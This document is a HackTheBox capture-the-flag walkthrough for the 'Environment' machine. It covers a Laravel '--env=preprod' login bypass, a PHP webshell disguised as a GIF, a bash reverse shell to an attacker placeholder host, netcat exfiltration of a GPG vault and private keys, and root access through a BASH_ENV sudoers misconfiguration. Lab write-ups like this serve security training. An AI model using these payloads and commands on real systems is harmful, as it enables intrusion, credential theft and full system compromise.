HackTheBox: Environment
1. Reconnaissance
The initial phase begins with a comprehensive port scan to identify exposed services.
sudo nmap -sCV -T4 10.129.x.x -oA nmap-initial
Results:
- Port 80/tcp:
nginx/1.22.1hosting a Laravel web application. - Port 22/tcp: OpenSSH.
Local DNS Configuration:
echo "10.129.x.x environment.htb" | sudo tee -a /etc/hosts
Directory Enumeration:
Using tools like feroxbuster or dirsearch revealed two critical endpoints:
http://environment.htb/index.php/login/http://environment.htb/upload
2. Initial Access
The target application runs Laravel 11.30.0 with APP_DEBUG=True, exposing stack traces that leak framework details.
We bypassed the authentication logic by exploiting the environment parameter:
POST /login?--env=preprod HTTP/1.1
Host: environment.htb
...
Intercepting the login request with Burp Suite and modifying the URL to append ?--env=preprod bypasses the standard authentication checks, granting internal access.
Webshell Upload
With authenticated access, the /upload endpoint accepts multipart/form-data. We bypassed file type restrictions by camouflaging a PHP webshell as a GIF image.
Payload (simple-backdoor.php):
GIF89a;
<?=$_="cmd";@system($_REQUEST[$_]);?>
Execution: Trigger the reverse shell by accessing the uploaded file:
http://environment.htb/storage/files/simple-backdoor.php?cmd=bash+-c+'bash+-i+>&+/dev/tcp/<ATTACKER_IP>/4242+0>&1'
Result: Gained initial foothold as www-data.
3. Lateral Movement to hish
While exploring the filesystem as www-data, we located a backup GPG key vault belonging to the user hish.
Exfiltration:
# On attacker machine
nc -nlvp 4444 > keyvault.gpg
# On target
nc <ATTACKER_IP> 4444 < /home/hish/backup/keyvault.gpg
Because GPG relies on asymmetric encryption, decrypting keyvault.gpg requires hish's private key located in /home/hish/.gnupg/private-keys-v1.d/. Only hish has read access. However, through further enumeration, a hardcoded password or credential reuse allowed SSH access as hish:
ssh hish@environment.htb
# Password: [REDACTED]
Decrypting the Vault:
Extract the .gnupg directory via SSH/nc, then decrypt the vault locally:
# On attacker machine
tar -xvf gnupg.tar
mv ~/.gnupg ~/.gnupg_backup
mv ./home/hish/.gnupg ~/.gnupg
gpg --decrypt keyvault.gpg
Result: Gained further sensitive information.
4. Privilege Escalation to Root
Checking sudo privileges for hish reveals:
hish@environment:~$ sudo -l
User hish may run the following commands:
(ALL) /usr/bin/systeminfo
/usr/bin/systeminfo is a bash script running with root privileges. It executes system commands (dmesg, ss, mount) without absolute paths. Crucially, the sudoers configuration allows passing the BASH_ENV variable:
env_keep+="ENV BASH_ENV"
PATH Hijacking via BASH_ENV
When bash is invoked, it reads and executes the file specified in BASH_ENV before executing the actual script. We can leverage this to execute a malicious script as root.
Exploit:
echo 'echo "ROOTED"; id; /bin/bash -p' > /tmp/root.sh
chmod +x /tmp/root.sh
env -i BASH_ENV=/tmp/root.sh \
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin \
sudo /usr/bin/systeminfo
Result: root shell obtained. The root flag is located at /root/root.txt ([REDACTED]).
Mechanism of Action: The
--env=preprodbypass is a logical framework abuse, not a CVE. The PATH hijacking technique succeeded because the sudoers file explicitly preservedBASH_ENV.